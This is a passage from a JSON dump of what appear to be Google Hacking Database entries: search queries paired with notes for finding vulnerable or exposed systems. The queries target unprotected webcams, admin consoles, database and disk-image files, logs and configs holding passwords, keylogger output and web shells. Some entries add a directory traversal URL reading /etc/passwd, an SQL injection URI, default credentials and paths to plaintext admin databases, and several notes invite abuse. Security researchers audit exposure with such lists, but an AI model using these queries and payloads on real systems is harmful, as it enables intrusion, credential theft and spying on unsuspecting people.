6.0\"", "long description": "siteZap webcams !", "submited": "2004-11-16", "request": "\"Starting SiteZAP 6.0\"", "id": 683}, {"short description": "intitle:\"phpPgAdmin - Login\" Language", "long description": "phpPgAdmin is a web-based administration tool for PostgreSQL. It is perfect for PostgreSQL DBAs, newbies and hosting services", "submited": "2005-03-03", "request": "intitle:\"phpPgAdmin - Login\" Language", "id": 684}, {"short description": "filetype:config web.config -CVS", "long description": "Through Web.config an IIS adminstrator can specify settings like custom 404 error pages, authentication and authorization settings for the Web site. This file can hold a plaintext password in the worst case or just reveil the full path info on a 404 error.", "submited": "2004-11-16", "request": "filetype:config web.config -CVS", "id": 685}, {"short description": "filetype:myd myd -CVS", "long description": "MySQL stores its data for each database in individual files with the extension MYD.An attacker can copy these files to his machine and using a tool like 'strings' possibly view the contents of the database.", "submited": "2004-11-18", "request": "filetype:myd myd -CVS", "id": 686}, {"short description": "\"Obtenez votre forum Aztek\" -site:forum-aztek.com", "long description": "Atztek Forum is a french forum system. Aztek Forum is reported prone to multiple input validation vulnerabilities. These issues may allow an attacker to carry out cross-site scripting and possibly other attacks.http://www.securityfocus.com/bid/11654", "submited": "2004-11-18", "request": "\"Obtenez votre forum Aztek\" -site:forum-aztek.com", "id": 687}, {"short description": "intext:(\"UBB.threads 6.2\"|\"UBB.threads 6.3\") intext:\"You * not logged *\" -site:ubbcentral.com", "long description": "UBB.Threads 6.2.*-6.3.* one char bruteforce vulnerability:http://www.k-otik.com/exploits/20041116.r57ubb.pl.php", "submited": "2004-11-18", "request": "intext:(\"UBB.threads 6.2\"|\"UBB.threads 6.3\") intext:\"You * not logged *\" -site:ubbcentral.com", "id": 688}, {"short description": "inurl:/SiteChassisManager/", "long description": "Unknown SQL injection and XSS vulnerabilities in DMXReady Site Chassis Manager.http://www.securityfocus.com/bid/11434/discussion/", "submited": "2004-11-18", "request": "inurl:/SiteChassisManager/", "id": 689}, {"short description": "\"Powered by Land Down Under 601\"", "long description": "sQL injection vulnerability in Land Down Under 601 could give an attacker administrative access. An exploit exists on the internet, search google.", "submited": "2004-11-18", "request": "\"Powered by Land Down Under 601\"", "id": 690}, {"short description": "intitle:\"EvoCam\" inurl:\"webcam.html\"", "long description": "Evocams !", "submited": "2004-11-18", "request": "intitle:\"EvoCam\" inurl:\"webcam.html\"", "id": 691}, {"short description": "inurl:directorypro.cgi", "long description": "A security vulnerability in the product allows attackers to perform a directory traversal attack and access files that reside outside the normal HTTP root directory.http://target/cgi-bin/directorypro.cgi?want=showcat&amp;show=../../../../etc/passwd%00http://www.securityfocus.com/bid/2793", "submited": "2004-11-18", "request": "inurl:directorypro.cgi", "id": 692}, {"short description": "intitle:\"PhpMyExplorer\" inurl:\"index.php\" -cvs", "long description": "PhpMyExplorer is a PHP application that allows you to easily update your site online without any FTP access. A security vulnerability in the product allows attackers to view and read files that reside outside the normal bound directory.", "submited": "2004-11-18", "request": "intitle:\"PhpMyExplorer\" inurl:\"index.php\" -cvs", "id": 693}, {"short description": "inurl:cal_make.pl", "long description": "A security vulnerability in PerlCal allows remote attackers to access files that reside outside the normally bounding HTML root directory. http://www.securityfocus.com/bid/2663", "submited": "2004-11-18", "request": "inurl:cal_make.pl", "id": 694}, {"short description": "inurl:/webedit.* intext:WebEdit Professional -html", "long description": "WebEdit is a content management system. This is the login portal search.", "submited": "2004-11-18", "request": "inurl:/webedit.* intext:WebEdit Professional -html", "id": 695}, {"short description": "intitle:\"Apache::Status\" (inurl:server-status | inurl:status.html | inurl:apache.html)", "long description": "The Apache::Status returns information about the server software, operating system, number of child processes and current visitors. The official documentation can be found at hxxp://search.cpan.org/~gozer/mod_perl-1.29/lib/Apache/Status.pm", "submited": "2004-11-21", "request": "intitle:\"Apache::Status\" (inurl:server-status | inurl:status.html | inurl:apache.html)", "id": 696}, {"short description": "\"Powered by PowerPortal v1.3\"", "long description": "PowerPortal is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. PowerPortal 1.3 is reported prone to this vulnerability, however, it is possible that other versions are affected as well. An example URI sufficient to exploit this vulnerability has been provided: http://www.example.com/pp13/index.php?index_page=and 1=1http://www.securityfocus.com/bid/11681", "submited": "2004-11-18", "request": "\"Powered by PowerPortal v1.3\"", "id": 697}, {"short description": "\"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)\" ext:log", "long description": "This file spills a lot of juicy info... in some cases, passwords in the raw dump, but not in any I've found this time around. However, with a computer name, a user name, and various other nuggets of info, this one file seems to sketch the system pretty well.", "submited": "2004-11-23", "request": "\"Microsoft (R) Windows * (TM) Version * DrWtsn32 Copyright (C)\" ext:log", "id": 698}, {"short description": "inurl:report \"EVEREST Home Edition \"", "long description": "Well what can be said about this one, I've added it to the DB under Juicy info, however it could have easilly gone under virtually any of the lists as it just give out Soooo much info. I can for instance find out the admin username (not just the adin every user) and also if it password protected and if the password ever expires plus is it a current user account, also do the same for any guest accounts, Ok nice and easy how about the O/S and all the Mapped Drive locations all there along with installed software and even currently running applications and processes. Site admins would have to be mad to leave this stuff open, but as we all know from the GHDB Site admins do weird and funny stuff. This one just gives out to much to list, so go have a look and see what you can find.", "submited": "2004-11-20", "request": "inurl:report \"EVEREST Home Edition \"", "id": 699}, {"short description": "\"powered by minibb\" -site:www.minibb.net -intext:1.7f", "long description": "miniBB is reported vulnerable to remote SQL injection. This issue is due to a failure of the application to properly validate user-supplied input prior to including it in an SQL query. miniBB versions prior to 1.7f are reported prone to this issue.http://www.securityfocus.com/bid/11688", "submited": "2004-11-19", "request": "\"powered by minibb\" -site:www.minibb.net -intext:1.7f", "id": 700}, {"short description": "\"powered by ducalendar\" -site:duware.com", "long description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Ducalendar it's: /ducalendar/_private/ducalendar.mdb", "submited": "2004-11-23", "request": "\"powered by ducalendar\" -site:duware.com", "id": 701}, {"short description": "\"Powered by Duclassified\" -site:duware.com", "long description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassified it's: /duclassified/_private/duclassified.mdb", "submited": "2004-11-23", "request": "\"Powered by Duclassified\" -site:duware.com", "id": 702}, {"short description": "\"Powered by Dudirectory\" -site:duware.com", "long description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For DuDirectory it's: /dudirectory/_private/dudirectory.mdb", "submited": "2004-11-23", "request": "\"Powered by Dudirectory\" -site:duware.com", "id": 703}, {"short description": "\"Powered by Duclassified\" -site:duware.com \"DUware All Rights reserved\"", "long description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassified it's: /duclassified/_private/duclassified.mdb", "submited": "2004-11-23", "request": "\"Powered by Duclassified\" -site:duware.com \"DUware All Rights reserved\"", "id": 704}, {"short description": "\"powered by duclassmate\" -site:duware.com", "long description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Duclassmate it's: /duclassmate/_private/duclassmate.mdb", "submited": "2004-11-23", "request": "\"powered by duclassmate\" -site:duware.com", "id": 705}, {"short description": "intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com", "long description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. For Dupics rename location to ../_private/dupics.mdb", "submited": "2004-11-23", "request": "intitle:dupics inurl:(add.asp | default.asp | view.asp | voting.asp) -site:duware.com", "id": 706}, {"short description": "\"powered by dudownload\" -site:duware.com", "long description": "Most duware products use Microsoft Access databases in default locations without instructing the users to change them. The plain text admin passwords are just a click away for any attacker who knows how to type an URL. rename ../xxx to ../_private/dudownload.mdb", "submited": "2004-11-23", "request": "\"powered by dudownload\" -site:duware.com", "id": 707}, {"short description": "intitle:\"ipcop - main\"", "long description": "IPCop Firewall is a Linux firewall for home and SOHO users. IPCop can be managed from a simple web interface (which can be found and managed by Google Hackers ;)", "submited": "2004-11-23", "request": "intitle:\"ipcop - main\"", "id": 708}, {"short description": "intitle:\"Smoothwall Express\" inurl:cgi-bin \"up * days\"", "long description": "smoothwall is a firewall operating system distribution based on Linux. (Not many results for this search at the moment).", "submited": "2004-11-24", "request": "intitle:\"Smoothwall Express\" inurl:cgi-bin \"up * days\"", "id": 709}, {"short description": "filetype:php HAXPLORER \"Server Files Browser\"", "long description": "Haxplorer is a webbased filemanager which enables the user to browse files on the webserver. You can rename, delete, copy, download and upload files. As the script's name says it is mostly installed by hackers", "submited": "2004-11-28", "request": "filetype:php HAXPLORER \"Server Files Browser\"", "id": 710}, {"short description": "inurl:coranto.cgi intitle:Login (Authorized Users Only)", "long description": "Coranto is one of the most powerful Content Management System (CMS) available on the market. It is a freeware product written in Perl and it can help the development and streamlining of your site(s). It is written to be a multiuser environment for posting news articles on a web site, it supports multiple browsers, multiple operating systems, produces standard compliant html, has a huge variety of excellent features and is fully extendible via addons. It is free for use on any site, personal or commercial!", "submited": "2004-11-28", "request": "inurl:coranto.cgi intitle:Login (Authorized Users Only)", "id": 711}, {"short description": "filetype:log intext:\"ConnectionManager2\"", "long description": "ISDNPM 3.x for OS/2-Dialer log files.These files contain sensitive info like ip addresses, phone numbers of dial in servers, usernames and password hashes - Everything you need to dial in....", "submited": "2004-11-28", "request": "filetype:log intext:\"ConnectionManager2\"", "id": 712}, {"short description": "intext:\"Videoconference Management System\" ext:htm", "long description": "Tandberg video conferencing appliancesThe webinterface enables you to drop calls and to browse the internal phonebook", "submited": "2004-11-28", "request": "intext:\"Videoconference Management System\" ext:htm", "id": 713}, {"short description": "ext:txt \"Final encryption key\"", "long description": "IPSec debug/log data which contains user data and password hashes.Can be used to crack passwords.", "submited": "2004-11-28", "request": "ext:txt \"Final encryption key\"", "id": 714}, {"short description": "filetype:log \"See `ipsec --copyright\"", "long description": "BARF log filesMan page:Barf outputs (on standard output) a collection of debugging information (contents of files, selections from logs, etc.) related to the IPSEC encryption/authentication system. It is primarily a convenience for remote debugging, a single command which packages up (and labels) all information that might be relevant to diagnosing a problem in IPSEC.", "submited": "2004-11-28", "request": "filetype:log \"See `ipsec --copyright\"", "id": 715}, {"short description": "intitle:\"Welcome To Xitami\" -site:xitami.com", "long description": "Default Xitami installationAdditionally every default installation of Xitami webserver has a testscript which provides a lot of information about the server.It can be run by entering the following urlhttp://server/cgialias/testcgi.exe(cgialias = is usually /cgi-bin/)", "submited": "2004-11-28", "request": "intitle:\"Welcome To Xitami\" -site:xitami.com", "id": 716}, {"short description": "inurl:testcgi xitami", "long description": "Testpage / webserver environmentThis is the test cgi for xitami webserver. It shows the webserver's complete environment. Contains very interesting information which can be used a first step into the server.", "submited": "2004-11-28", "request": "inurl:testcgi xitami", "id": 717}, {"short description": "intitle:\"DocuShare\" inurl:\"docushare/dsweb/\" -faq -gov -edu", "long description": "some companies use a Xerox Product called DocuShare. The problem with this is by default guest access is enabled and it appears a lot of companies either don't care or don't know.", "submited": "2004-11-28", "request": "intitle:\"DocuShare\" inurl:\"docushare/dsweb/\" -faq", "id": 718}, {"short description": "intext:\"Powered By: TotalIndex\" intitle:\"TotalIndex\"", "long description": "TotalIndex v2.0 is an open source script that is designed to replace the simple, and boring default index page of a site which lists the files in an indexed folder. It's not PW protected so an attacker can browse the files and take what they want.", "submited": "2004-11-28", "request": "intext:\"Powered By: TotalIndex\" intitle:\"TotalIndex\"", "id": 719}, {"short description": "inurl:\"GRC.DAT\" intext:\"password\"", "long description": "symantec Norton Anti-Virus Corporate Edition data file containing encrypted passwords.", "submited": "2004-11-28", "request": "inurl:\"GRC.DAT\" intext:\"password\"", "id": 720}, {"short description": "inurl:php.exe filetype:exe -example.com", "long description": "It is possible to read any file remotely on the server with PHP.EXE (assuming a script alias for it is enabled), even across drives. (Note: The GHDB has another search for this file based on directorly listings, try them both)", "submited": "2004-11-28", "request": "inurl:php.exe filetype:exe -example.com", "id": 721}, {"short description": "intitle:\"PHP Advanced Transfer\" inurl:\"login.php\"", "long description": "PHP Advacaned Transfer is GPL'd software that claims to be the \"The ultimate PHP download &amp; upload manager\". This is a search for the login pages.", "submited": "2004-11-28", "request": "intitle:\"PHP Advanced Transfer\" inurl:\"login.php\"", "id": 722}, {"short description": "intitle:\"PHP Advanced Transfer\" (inurl:index.php | inurl:showrecent.php )", "long description": "PHP Advacaned Transfer is GPL'd software that claims to be the \"The ultimate PHP download &amp; upload manager\". This is a search for the main and recently changed files pages.", "submited": "2004-11-28", "request": "intitle:\"PHP Advanced Transfer\" (inurl:index.php | inurl:showrecent.php )", "id": 723}, {"short description": "\"Output produced by SysWatch *\"", "long description": "sysWatch is a CGI to display current information about your UNIX system. It can display drive partitions, disk or drive usage, as well as resource hogs (running processes) and last but not lease it shows what current users are doing online (including sh scripts etc..).", "submited": "2004-11-28", "request": "\"Output produced by SysWatch *\"", "id": 724}, {"short description": "PHPKonsole PHPShell filetype:php -echo", "long description": "PHPKonsole is just a little telnet like shell wich allows you to run commands on the webserver. When you run commands they will run as the webservers UserID. This should work perfectly for managing files, like moving, copying etc. If you're using a linux server, system commands such as ls, mv and cp will be available for you...", "submited": "2004-11-28", "request": "PHPKonsole PHPShell filetype:php -echo", "id": 725}, {"short description": "\"Phorum Admin\" \"Database Connection\" inurl:forum inurl:admin", "long description": "Phorum admin pagesThis either shows Information leakage (path info) or it shows Unprotected Admin pages.", "submited": "2004-11-28", "request": "\"Phorum Admin\" \"Database Connection\" inurl:forum inurl:admin", "id": 726}, {"short description": "\"Warning: mysql_query()\" \"invalid query\"", "long description": "MySQL query errors revealing database schema and usernames.", "submited": "2004-11-28", "request": "\"Warning: mysql_query()\" \"invalid query\"", "id": 727}, {"short description": "inurl:\"/cgi-bin/loadpage.cgi?user_id=\"", "long description": "Description:EZshopper is a full-featured shopping cart program. loadpage.cgi of EZshopper allows Directory Traversal http://www.securityfocus.com/bid/2109", "submited": "2004-11-29", "request": "inurl:\"/cgi-bin/loadpage.cgi?user_id=\"", "id": 728}, {"short description": "inurl:\"ipp/pdisplay.htm\"", "long description": "Providing a standout printing solution, Novell iPrint offers secure print services that extend across multiple networks and operating systems bringing the power of the Net to your business environment. This search locates various online printers.", "submited": "2004-11-30", "request": "inurl:\"ipp/pdisplay.htm\"", "id": 729}, {"short description": "filetype:mdb inurl:\"news/news\"", "long description": "Web Wiz Site News unprotected database holds config and admin information in a microsoft access database in news/news.mdb. This information is almost always unprotected.", "submited": "2004-11-30", "request": "filetype:mdb inurl:\"news/news\"", "id": 730}, {"short description": "intitle:\"View Img\" inurl:viewimg.php", "long description": "It is reported that the 'viewing.php' script does not properly validate user-supplied input in the 'path' variable. A remote user can submit a specially crafted URL to view a list of files within an arbitrary directory. See http://securitytracker.com/alerts/2004/Nov/1012312.html  for more information.", "submited": "2004-11-30", "request": "intitle:\"View Img\" inurl:viewimg.php", "id": 731}, {"short description": "intitle:\"Resin Default Home Page\"", "long description": "Resin provides a fast standalone web server. This search locates those servers based on the title of the default page.", "submited": "2004-11-30", "request": "intitle:\"Resin Default Home Page\"", "id": 732}, {"short description": "intext:\"Storage Management Server for\" intitle:\"Server Administration\"", "long description": "These pages can reveal information about the operating system and patch level, as well as providing a login portal for hackers to attack. \"As part of the IBM TotalStorage Open Software Family, IBM Tivoli Storage (ADSM) Manager protects your organization's data from hardware failures and other errors by storing backup and archive copies of data on offline storage.\"", "submited": "2004-11-30", "request": "intext:\"Storage Management Server for\" intitle:\"Server Administration\"", "id": 733}, {"short description": "filetype:pl -intext:\"/usr/bin/perl\" inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)", "long description": "WebCal allows you to create and maintain an interactive events calendar or scheduling system on your Web site. The file names explain themselves, but don't abuse the faulty admins.", "submited": "2004-12-01", "request": "filetype:pl -intext:\"/usr/bin/perl\" inurl:webcal (inurl:webcal | inurl:add | inurl:delete | inurl:config)", "id": 734}, {"short description": "site:ups.com intitle:&amp;quot;Ups Package tracking&amp;quot; intext:&amp;quot;1Z ### ### ## #### ### #&amp;quot;", "long description": "Ever use the UPS Automated Tracking Service?? Wanna see where packages are going? Want to Man-in-the-middle their delivery? Well, then here it is.-Digital Spirit", "submited": "2004-11-25", "request": "site:ups.com intitle:\"Ups Package tracking\" intext:\"1Z ### ### ## #### ### #\"", "id": 735}, {"short description": "intitle:\"twiki\" inurl:\"TWikiUsers\"", "long description": "TWiki has many security problems, depeding on the version installed. TWiki, is a flexible, powerful, and easy to use enterprise collaboration platform. It is a structured Wiki, typically used to run a project development space, a document management system, a knowledge base, or any other groupware tool, on an intranet or on the internet. Web content can be created collaboratively by using just a browser. Developers can create new web applications based on a Plugin API.", "submited": "2004-12-02", "request": "intitle:\"twiki\" inurl:\"TWikiUsers\"", "id": 736}, {"short description": "+\"Powered by Invision Power Board v2.0.0..2\"", "long description": "A remote SQL injection vulnerability affects Inivision Power Board. This issue is due to a failure of the application to properly validate user-supplied input prior to using it in an SQL query.http://www.securityfocus.com/bid/11719", "submited": "2004-12-01", "request": "+\"Powered by Invision Power Board v2.0.0..2\"", "id": 737}, {"short description": "ext:gho gho", "long description": "Norton Ghost allows administrators to create hard rive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything!", "submited": "2004-12-03", "request": "ext:gho gho", "id": 738}, {"short description": "ext:pqi pqi -database", "long description": "PQ DriveImage allows administrators to create hard rive images for lots of purposes including backup, migration, etc. These files contain the hard drive images which can be restored to create an exact duplicate of a hard drive, which could contain just about anything!", "submited": "2004-12-03", "request": "ext:pqi pqi -database", "id": 739}, {"short description": "ext:vmdk vmdk", "long description": "VMWare allows PC emulation across a variety of platforms. These files are VMWare disk images which essentially contain a copy of an entire PC, which could contain almost anything.", "submited": "2004-12-03", "request": "ext:vmdk vmdk", "id": 740}, {"short description": "ext:vmx vmx", "long description": "VMWare allows PC emulation across a variety of platforms. Theseconfiguration files describe a virtual PC, and reveal information about that PC's hardware settings.", "submited": "2004-12-03", "request": "ext:vmx vmx", "id": 741}, {"short description": "inurl:filezilla.xml -cvs", "long description": "filezilla.xml contains Sites,Logins and crypted Passwords of ftp connections made with the open source programm filezilla.", "submited": "2004-12-02", "request": "inurl:filezilla.xml -cvs", "id": 742}, {"short description": "+\"Powered by phpBB 2.0.6..10\" -phpbb.com -phpbb.pl", "long description": "phpbb is vulnerable to SQL Injection, allowing people to minipulate the query into pulling data (such as passwords). Arbituary EXEC allows an attacker (if they get on to a new line), to execute their own PHP, which can be fatal.", "submited": "2004-12-01", "request": "+\"Powered by phpBB 2.0.6..10\" -phpbb.com -phpbb.pl", "id": 743}, {"short description": "\"Copyright (c) Tektronix, Inc.\" \"printer status\"", "long description": "Captain, the Phasers are online :)", "submited": "2004-12-03", "request": "\"Copyright (c) Tektronix, Inc.\" \"printer status\"", "id": 744}, {"short description": "intext:\"MaiLinX Alert (Notify)\" -site:networkprinters.com", "long description": "Xerox DocuPrint printer models.", "submited": "2004-12-03", "request": "intext:\"MaiLinX Alert (Notify)\" -site:networkprinters.com", "id": 745}, {"short description": "inurl:\"printer/main.html\" intext:\"settings\"", "long description": "Brother HL Printers.", "submited": "2004-12-03", "request": "inurl:\"printer/main.html\" intext:\"settings\"", "id": 746}, {"short description": "inurl:\"sitescope.html\" intitle:\"sitescope\" intext:\"refresh\" -demo", "long description": "Mercury SiteScope designed to ensure the availability and performance of distributed IT infrastructures e.g., servers, operating systems, network devices, network services, applications, and components. Some pages may be IP restricted.", "submited": "2004-12-03", "request": "inurl:\"sitescope.html\" intitle:\"sitescope\" intext:\"refresh\" -demo", "id": 747}, {"short description": "axis storpoint \"file view\" inurl:/volumes/", "long description": "The Axis Storpoint device turns a SCSI or ATA box with lots of cdrom players (or writers) into a cd tower which can be browsed through any browser. The default admin password combo = root/pass. CD access can be password restricted like in Apache. Axis uses it's own server software. Many vulnerabilities can be found in the security databases like SF.", "submited": "2004-12-04", "request": "axis storpoint \"file view\" inurl:/volumes/", "id": 748}, {"short description": "inurl:\"/axs/ax-admin.pl\" -script", "long description": "This system records visits to your site. This admin script allows you to display these records in meaningful graph and database formats.", "submited": "2004-12-04", "request": "inurl:\"/axs/ax-admin.pl\" -script", "id": 749}, {"short description": "\"Generated by phpSystem\"", "long description": "PhpSystem shows info about unix systems, including: General Info (kernel, cpu, uptime), Connections, Who Is Logged In, Memory, Swap and active mounts.", "submited": "2004-12-05", "request": "\"Generated by phpSystem\"", "id": 750}, {"short description": "php-addressbook  \"This is the addressbook for *\" -warning", "long description": "php-addressbook shows user address information without a password.", "submited": "2004-12-05", "request": "php-addressbook  \"This is the addressbook for *\" -warning", "id": 751}, {"short description": "intitle:\"Multimon UPS status page\"", "long description": "Multimon provide UPS monitoring services", "submited": "2004-12-04", "request": "intitle:\"Multimon UPS status page\"", "id": 752}, {"short description": "intitle:\"Mail Server CMailServer Webmail\" \"5.2\"", "long description": "CMailServer is a small mail webmail server. Multiple vulnerabilities were found, including buffer overflow, SQL Injection and XXS.http://www.securiteam.com/windowsntfocus/6E00M2KBPS.html", "submited": "2004-12-04", "request": "intitle:\"Mail Server CMailServer Webmail\" \"5.2\"", "id": 753}, {"short description": "intitle:\"index of\" \"parent directory\" \"desktop.ini\" site:dyndns.org", "long description": "This search uses desktop.ini to track users with a webserver running on their desktop computers. It can easily be extended to find specific documents.", "submited": "2004-12-05", "request": "intitle:\"index of\" \"parent directory\" \"desktop.ini\" site:dyndns.org", "id": 754}, {"short description": "intitle:\"Live NetSnap Cam-Server feed\"", "long description": "Netsnap Online Cameras", "submited": "2004-12-06", "request": "intitle:\"Live NetSnap Cam-Server feed\"", "id": 755}, {"short description": "intitle:\"V-Gear BEE\"", "long description": "V-Gear Bee Web Cameras", "submited": "2004-12-06", "request": "intitle:\"V-Gear BEE\"", "id": 756}, {"short description": "intitle:\"AudioReQuest.web.server\"", "long description": "Audio ReQuest home CD/MP3 player. Various information about the configuration of the host and surrounding network can be found out by visiting the main page of this server. Beyond that, you could peruse someones MP3 collection!", "submited": "2004-12-06", "request": "intitle:\"AudioReQuest.web.server\"", "id": 757}, {"short description": "filetype:php inurl:ipinfo.php \"Distributed Intrusion Detection System\"", "long description": "Dshield is a distributed intrusion detection system. The ipinfo.php script includes a whois lookup form.", "submited": "2004-12-07", "request": "filetype:php inurl:ipinfo.php \"Distributed Intrusion Detection System\"", "id": 758}, {"short description": "ext:cfg radius.cfg", "long description": "\"Radiator is a highly configurable and flexible Radius server that supports authentication by nearly 60 different types of authentication methods\"This search finds configuration files for this server, revealing its behaviour, methods for authenticating users, etc.", "submited": "2004-12-06", "request": "ext:cfg radius.cfg", "id": 759}, {"short description": "intitle:\"VitalQIP IP Management System\"", "long description": "The VitalQIP Web Client Interface provides a World Wide Web interface for the VitalQIP IP Management software. The purpose of the VitalQIP Web Client Interface is to allow users to add, modify, and delete IP addresses; create configuration and data files; and generate reports. It is not a fully functional user interface, such as the VitalQIP Windows or VitalQIP UNIX Clients. Certain options, such as infrastructure or policy management, are not provided. The VitalQIP Web Client Interface software is based on HTML and Perl, so your organization can customize it to meet your requirements. Vendors site: http://www.lucent.com/products/solution/0,,CTID+2020-STID+10438-SOID+1456-LOCL+1,00.html", "submited": "2004-12-07", "request": "intitle:\"VitalQIP IP Management System\"", "id": 760}, {"short description": "intext:\"powered by Web Wiz Journal\"", "long description": "Web Wiz Journal ASP Blog. The MDB database is mostly unprotected and can be downloaded directly. The DB contains administrative acccountsfilename: journal.mdbadmin login: admin.html", "submited": "2004-12-13", "request": "intext:\"powered by Web Wiz Journal\"", "id": 761}, {"short description": "intitle:\"vhost\" intext:\"vHost . 2000-2004\"", "long description": "vHost is a one-step solution for all virtual hosting needs. It enables a Linux/BSD server with single or multiple IP addresses to function as unlimited virtual hosts with HTTP, FTP, SMTP, POP3, IMAP, and other virtual services extentable via modules. It comes with both command-line and web-based graphical user interfaces, which give maximum control to a domain's owner, while relieving the system administrator of most routine administration tasks.", "submited": "2004-12-13", "request": "intitle:\"vhost\" intext:\"vHost . 2000-2004\"", "id": 762}, {"short description": "intitle:\"start.managing.the.device\" remote pbx acc", "long description": "MCK Communications, Inc.PBXgatewayIIHigh density central site gateway for remote PBX access(MCK Communications is now known as VESO.)", "submited": "2004-12-10", "request": "intitle:\"start.managing.the.device\" remote pbx acc", "id": 763}, {"short description": "allintext:\"Powered by LionMax Software\" \"WWW File Share\"", "long description": "WWW File Share Pro is a small HTTP server that can help you share files with your friends. They can download files from your computer or upload files from theirs. Simply specify a directory for downloads and a directory for uploads. All servers can be accessed anonymously", "submited": "2004-12-13", "request": "allintext:\"Powered by LionMax Software\" \"WWW File Share\"", "id": 764}, {"short description": "inurl:\":631/printers\" -php -demo", "long description": "CUPS provides a portable printing layer for UNIX-based operating systems. It has been developed by Easy Software Products to promote a standard printing solution for all UNIX vendors and users. CUPS provides the System V and Berkeley command-line interfaces. CUPS uses the Internet Printing Protocol (\"IPP\") as the basis for managing print jobs and queues. The Line Printer Daemon (\"LPD\") Server Message Block (\"SMB\"), and AppSocket (a.k.a. JetDirect).", "submited": "2004-12-13", "request": "inurl:\":631/printers\" -php -demo", "id": 765}, {"short description": "ext:dat bpk.dat", "long description": "Perfect Keylogger is as the name says a keylogger :)This dork finds the corresponding datafiles which can be read with the free downloadable lite version.", "submited": "2004-12-13", "request": "ext:dat bpk.dat", "id": 766}, {"short description": "intitle:\"iVISTA.Main.Page\"", "long description": "And again another webcam search. MOst of these cams seem to be security cams", "submited": "2004-12-13", "request": "intitle:\"iVISTA.Main.Page\"", "id": 767}, {"short description": "inurl:2506/jana-admin", "long description": "The JanaServer 2 is amongst other things a proxy server, that makes it possible for LAN members, everyone or a group as a part of the LAN, to access the internet via a Modem, ISDN or DSL connection. For this the program must be installed on the computer, that can access the internet by an installed modem, ISDN or a DSL adapter.", "submited": "2004-12-13", "request": "inurl:2506/jana-admin", "id": 768}, {"short description": "intitle:\"Spam Firewall\" inurl:\"8000/cgi-bin/index.cgi\"", "long description": "The Barracuda Spam Firewall is an integrated hardware and software solution for complete protection of your email server. It provides a powerful, easy to use, and affordable solution to eliminating spam and virus from your organization.", "submited": "2004-12-13", "request": "intitle:\"Spam Firewall\" inurl:\"8000/cgi-bin/index.cgi\"", "id": 769}, {"short description": "inurl:ds.py", "long description": "Affordable Web-based document and content management application lets businesses of every size rapidly deploy a world-class Enterprise Content Management (ECM) solution to help reduce costs, optimize information flow, and reduce risk", "submited": "2004-12-13", "request": "inurl:ds.py", "id": 770}, {"short description": "inurl:\"1220/parse_xml.cgi?\"", "long description": "Quicktime streaming server is uhhhhh.....well it's a streaming server and it can be managed via http. No need to say more. Darwin Streaming Server is the opensource version (for *NUX os's).Some are pass protected, others not.", "submited": "2004-12-10", "request": "inurl:\"1220/parse_xml.cgi?\"", "id": 771}, {"short description": "intitle:\"MX Control Console\" \"If you can't remember\"", "long description": "MX Logics customizable and easy-to-use MX Control ConsoleSM is a centralized email threat management policy platform that provides you with one interface for managing all corporate-wide email threats, protection and security. With the MX Control Console, you can easily configure and control your email protection and security based on your overall corporate email policies.", "submited": "2004-12-19", "request": "intitle:\"MX Control Console\" \"If you can&#039;t remember\"", "id": 772}, {"short description": "intext:\"Welcome to the Web V.Networks\" intitle:\"V.Networks [Top]\" -filetype:htm", "long description": "see and control JVC webcameras, you can move the camera, zoom... change the settings, etc....", "submited": "2004-12-07", "request": "intext:\"Welcome to the Web V.Networks\" intitle:\"V.Networks [Top]\" -filetype:htm", "id": 773}, {"short description": "intitle:\"WebLogic Server\" intitle:\"Console Login\" inurl:console", "long description": "BEA WebLogic Server 8.1 provides an industrial-strength application infrastructure for developing, integrating, securing, and managing distributed service-oriented applications. By simplifying and unifying the enterprise infrastructure, IT organizations can now deliver greater value in less time, at reduced cost to the overall business.", "submited": "2004-12-19", "request": "intitle:\"WebLogic Server\" intitle:\"Console Login\" inurl:console", "id": 774}, {"short description": "ext:conf inurl:rsyncd.conf -cvs -man", "long description": "rsync is an open source utility that provides fast incremental file transfer.rsync can also talk to \"rsync servers\" which can provide anonymous or authenticated rsync.The configuration files contain data about peers and paths", "submited": "2004-12-19", "request": "ext:conf inurl:rsyncd.conf -cvs -man", "id": 775}, {"short description": "inurl:\"phpOracleAdmin/php\" -download -cvs", "long description": "phpOracleAdmin is intended to be a webbased Oracle Object Manager.In many points alike phpMyAdmin, it should offer more comfort and possibilities. Interestingly these managers are not password protected.", "submited": "2004-12-19", "request": "inurl:\"phpOracleAdmin/php\" -download -cvs", "id": 776}, {"short description": "inurl:1810 \"Oracle Enterprise Manager\"", "long description": "Enterprise Manager 10g Grid Control provides a single tool that can monitor and manage not only every Oracle software element in your grid, but also Web applications, hosts, and the network in between. Grid Control is also extensible via an SDK so customers can use it to monitor additional components that are not supported out-of-the box.", "submited": "2004-12-19", "request": "inurl:1810 \"Oracle Enterprise Manager\"", "id": 777}, {"short description": "\"Powered by Invision Power File Manager\" (inurl:login.php) | (intitle:\"Browsing directory /\" )", "long description": "Invision Power File Manager is a popular file management script, written in the popular PHP Scripting Language. It is compatiable with all forms of Unix and Windows and allows the user to control their files via any modern browser.", "submited": "2004-12-19", "request": "\"Powered by Invision Power File Manager\" (inurl:login.php) | (intitle:\"Browsing directory /\" )", "id": 778}, {"short description": "intitle:\"Novell Web Services\" intext:\"Select a service and a language.\"", "long description": "\"Novell GroupWise is an enterprise collaboration system that provides secure e-mail, calendaring, scheduling, and instant messaging. GroupWise also includes task management, contact management, document management, and other productivity tools. GroupWise can be used on your desktop on Linux, Windows*, or Macintosh; in a Web 